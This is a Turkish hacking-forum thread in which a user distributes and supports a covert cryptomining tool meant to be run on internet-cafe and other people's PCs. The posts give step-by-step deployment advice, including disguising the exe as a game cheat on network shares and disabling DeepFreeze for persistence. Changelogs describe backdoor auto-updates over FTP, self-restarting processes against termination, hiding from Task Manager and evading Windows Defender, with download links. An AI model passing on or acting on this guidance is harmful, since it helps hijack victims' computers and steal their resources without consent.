Crypto Mining BOTNET: Zombi sistemlerinize kendi bitcoin'inizi kazdırın

YUROS

Katılımcı Üye
16 Ocak 2016
329
0
aga şiimdi bunu usbyemi yüklememiz lazım yoksa yandex disk gibi bi uygulamaya upload yapıp içerisindekileri güncelleyip oraya yüklesek örn net cafede yapsam indirip kursam sonra silsem indirdiğim dosyayi sıkıntı olurmu bana detayli şekilşde yazarmısın :D
 

zalim5811

Üye
3 Eki 2012
72
30
aga şiimdi bunu usbyemi yüklememiz lazım yoksa yandex disk gibi bi uygulamaya upload yapıp içerisindekileri güncelleyip oraya yüklesek örn net cafede yapsam indirip kursam sonra silsem indirdiğim dosyayi sıkıntı olurmu bana detayli şekilşde yazarmısın :D
once configi doldur. nasil dolduralacagini configin icinde anlattim. internet cafede acacagina gore 7/24 calistirmak isteyebilirsin. o yuzden normal-time degerini PT15M yapmani oneririm.
configi doldurduktan sonra wrapper.exe yi calistir. cikan dosyalardan miner-ready.exe nin adini degistirebilirsin ama hook.dll nin adi ayni kalmali.
sonra btnet klasorundeki dll ve exe yi ister usb ye at istersen bi yere uploadla. exe yi dll yanindayken sistemde acman yeterli, nerden oldugu onemsiz usb ya da internetten indirilmiş..
sonrasinda silebilirsin iki dosyayi da
 

YUROS

Katılımcı Üye
16 Ocak 2016
329
0
simdi bunu yapdık yükledik diyelim ki daha önce benzerini yapdım 2 hatta 3 4 cafeden atıldıydım :D adam ekrandan izledi galiba normalde boot dan yapdıydım usb takıp bunu sadece calıstırıp silmem gerekiyor öylemi bide nerden takip edeceğiz yani zombi elemanları düşdümü düşmedimi diye sisteme

tek tek pcyemi yüklemek lazım yoksa ağ üzerine yayılıormu bu

bide mesela bugun yükledim diye lim adama sunucu yada şalteri indirince ertesi gün tekrar devreye girermi


buna benzer yapdığımda nette yawaşlık ping vs cıkmaya basladı adamlar ilkde anlamadı ama daha sonra anladılar adamların cafesi iş yapamadı od derece söyliyim sana :D mesela adam toplu pcyi ana masada kapatınca benim pc kapanmıordu

:D ordan anladı bi ara sordu usb mi taktin felan diye
 
Son düzenleme:

zalim5811

Üye
3 Eki 2012
72
30
simdi bunu yapdık yükledik diyelim ki daha önce benzerini yapdım 2 hatta 3 4 cafeden atıldıydım :D adam ekrandan izledi galiba normalde boot dan yapdıydım usb takıp bunu sadece calıstırıp silmem gerekiyor öylemi bide nerden takip edeceğiz yani zombi elemanları düşdümü düşmedimi diye sisteme

tek tek pcyemi yüklemek lazım yoksa ağ üzerine yayılıormu bu

bide mesela bugun yükledim diye lim adama sunucu yada şalteri indirince ertesi gün tekrar devreye girermi


buna benzer yapdığımda nette yawaşlık ping vs cıkmaya basladı adamlar ilkde anlamadı ama daha sonra anladılar adamların cafesi iş yapamadı od derece söyliyim sana :D mesela adam toplu pcyi ana masada kapatınca benim pc kapanmıordu

:D ordan anladı bi ara sordu usb mi taktin felan diye
acildigi pcde kendini direkt yerlestip calismaya basliyor. usb sorun olacagi icin bence bi yere uploadla sonradan indirip acarsin.
hayir agda y.ayilma gibi bi islevi yok sadece acildigi bilgisayar.
eger deepfreeze tarzi bir sey varsa restart tan sonra silinir. deepfreeze kapatip exeyi acarsan bilgisayari kapatip acsalarda calismaya devam eder.
agda paylasilan dosyalara koysan cs 1.6 aimbot adiyla falan baskalari da acar :kahkaha bilmiyorum artik yaraticiliginiza kalmis.
 
Son düzenleme:

CadoqBey

Yeni üye
7 Nis 2016
18
0
öncelikle paylaşımınız için teşekkür ederim. Bu coin konularını pek bilmediğimden soruyorum ftp nin bu mining içindeki olayı ne ?
 

zalim5811

Üye
3 Eki 2012
72
30
20de bıraktım da bu rigsler nicehashe yazmıyor. 20ye yakın kişiye yedirdim ama nicehashe yazmadı rig olarak
1 rigde calismasi normal. hepsine unmanaged ismi koyuyor. eger guncelleme yapacak olursam her sistem icin dinamik isimlendirme eklerim.
bagis 20 ise her 5 kazidan 1i bana geliyor. ftp ye girilen loglarin 5inden 1i benim nicehash icin yani.
tesekkurler :)
 
Son düzenleme:

zalim5811

Üye
3 Eki 2012
72
30
UPDATE 3

changelog:
- DLL gereksinimi kaldırıldı.
- NiceHash için dinamik isimlendirme eklendi.
- Artık güncelleme olduğunda backdoor ile otomatik olarak gönderebileceksiniz :).
- Artık logları okumak için farklı bir client a ihtiyaç yok. Wrapperın içinde logları indirebilen ve gerektiğinde sıfırlayan işlev eklendi.
- Compiler değişti. (GCC --> MSVC)
- Kod optimizasyonu (dosya boyutu 30MB --> 23MB)
- Confige compress secenegi eklendi.
- Artık miner-ready.exe ye derlerken icon koyabilirsiniz(Wrapper ile aynı konuma koyulan icon.ico exe ye icon olarak atanır).
- Bug fixes
DL: https://drive.google.com/open?id=1LPfoQaGpP7CkKLIv68s3d8EvZxV6jVnf


anlatım burda: https://www.turkhackteam.org/8965255-post15.html

@Muratozturk ilgilenirseniz :) . Bundan sonraki updateler otoamtik gönderilebilecek.
 
Son düzenleme:

Hichigo

Uzman üye
30 Ağu 2015
1,190
42
github.com/tarik0
Forumda böyle konular görmek beni çok mutlu ediyor. Konunun özelliklerine tam hakim değim ancak gelecekte windows api hooking ve daha interaktif bir haberleşme sistemi kullanabilirsin IRC veya benim şu aralar favorim olan Discord gibi. Boylece portlarla uğraşmana gerek kalmaz ve ciddi miktarda kurbanı kontrol etmen kolaylaşır ama bence en önemlisi konuna görsellik eklemelisin. Tekrardan eline sağlık.
 

zalim5811

Üye
3 Eki 2012
72
30
Forumda böyle konular görmek beni çok mutlu ediyor. Konunun özelliklerine tam hakim değim ancak gelecekte windows api hooking ve daha interaktif bir haberleşme sistemi kullanabilirsin IRC veya benim şu aralar favorim olan Discord gibi. Boylece portlarla uğraşmana gerek kalmaz ve ciddi miktarda kurbanı kontrol etmen kolaylaşır ama bence en önemlisi konuna görsellik eklemelisin. Tekrardan eline sağlık.
öncelike teşekkürler :) miner'ı gizlemek için task managera api hooking implemente ediyorum zaten yavaş yavaş. çözücem o işi. irc veya discord ne alaka onu anlamadım. ne portu?
görsel eklemek aklımda.
 

InFLaMS

Yeni üye
16 Ocak 2016
20
1
UPDATE 3

changelog:
- DLL gereksinimi kaldırıldı.
- NiceHash için dinamik isimlendirme eklendi.
- Artık güncelleme olduğunda backdoor ile otomatik olarak gönderebileceksiniz :).
- Artık logları okumak için farklı bir client a ihtiyaç yok. Wrapperın içinde logları indirebilen ve gerektiğinde sıfırlayan işlev eklendi.
- Compiler değişti. (GCC --> MSVC)
- Kod optimizasyonu (dosya boyutu 30MB --> 23MB)
- Confige compress secenegi eklendi.
- Artık miner-ready.exe ye derlerken icon koyabilirsiniz(Wrapper ile aynı konuma koyulan icon.ico exe ye icon olarak atanır).
- Bug fixes
DL: https://drive.google.com/open?id=1LPfoQaGpP7CkKLIv68s3d8EvZxV6jVnf


anlatım burda: https://www.turkhackteam.org/8965255-post15.html

@Muratozturk ilgilenirseniz :) . Bundan sonraki updateler otoamtik gönderilebilecek.


Eline sağılık kardeşim tam aradığım şeydi teşekkür ederim
 

Naplest

Yeni üye
10 Haz 2019
4
0
Öncelikle güzel konu bir sorum var zombi olacak bilgisayara nicehash in programını indirmemiz gerekiyormu yoksa sadece dll ile exe yi mi göndermek lazım
 

zalim5811

Üye
3 Eki 2012
72
30
Öncelikle güzel konu bir sorum var zombi olacak bilgisayara nicehash in programını indirmemiz gerekiyormu yoksa sadece dll ile exe yi mi göndermek lazım
Update 3 changelogunda da yazdigim gibi.. dll gereksinimi yok artik. wrapper ile olusturulan exe nin atilip acilmasi yeterli. baska hicbirseye gerek yok.
Eline sağılık kardeşim tam aradığım şeydi teşekkür ederim
rica ederim
Pardon ben sunucu stub iliskisi ve arada gerçekleşen bir bağlantı gibi bir şey var sanıyordum.
yok bu kendini acildigi sistemde deploylayan basit bi coin miner. o sistemler cok da 'botnet' sayilmaz aslinda.
 

zalim5811

Üye
3 Eki 2012
72
30
HOTFİX 3.1


changelog:
- ftp-update true iken miner'ın başlatılamaması sorunu giderildi.


releaseden önce yeterince test edemediğim için kusura bakmayın.


DL: https://drive.google.com/drive/folders/1lJgNZXyaBs5Lc-h9QekNfTHtXxDrjYPm

UPDATE


changelog:
- !Miner daemon güncellendi, daha yüksek hashrate için optimizasyon yapıldı!
- FTP üzerinden güncelleme gönderme mantığı geliştirildi.
- Confige "sürekli kaz" seçeneği eklendi.
- Birkaç exception handling halledildi.


DL: https://drive.google.com/open?id=1lJgNZXyaBs5Lc-h9QekNfTHtXxDrjYPm



bu sürümü win10 kurulu bir virtual machinede test ettim ve windows defender yakalayamadı.
bu arada kullananların sayısının arttığını görüyorum. bağışlarınız için teşekkürler. herhangi bir sorun, istek veya öneriyi discorddan ya da direkt bu konudan belirtebilirsiniz.

UPDATE

changelog:
- Miner'ın terminate edilmesine karşı dummy process eklendi
- confige dummy-process ve ftp-resurrection-log secenekleri eklendi(aciklamalari configde var)
- FTP loglama ve upload servislerinin mantigi gelistirildi
- Genel optimizasyon under-the-hood

miner'in oldurulmesine karsi simdilik gecici yontem bu. oldurulduklerinde birbirlerini baslatan processler olusturmak.. biraz bahsetmem gerekirse kodum python + c den olusuyor. curl ile ugrasmamak icin ftp logging gibi islemleri pythonun ftplib ile yapiyorum. onun disinda mineri baslatmayi, creation flaglerini passlemeyi vs. c ile yapiyorum. son cikarimima gire python ile windowsda api hooking yapmak hem gereksiz zor hem de boş bir iş. bu isleri c ile yapiyor olacagim artik :)

DL: https://drive.google.com/open?id=1lJgNZXyaBs5Lc-h9QekNfTHtXxDrjYPm
 
Moderatör tarafında düzenlendi:

zalim5811

Üye
3 Eki 2012
72
30
bu programimin ustunde daha fazla calismiyorum. ama son surumde cokme gibi sorun yasayanlar yazabilirler. onlari cozeriz

bu arada bu konudaki mesajlari silen mod neye gore sildigini belirtirse cok guzel olur. bosuna yazmamis oluruz.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.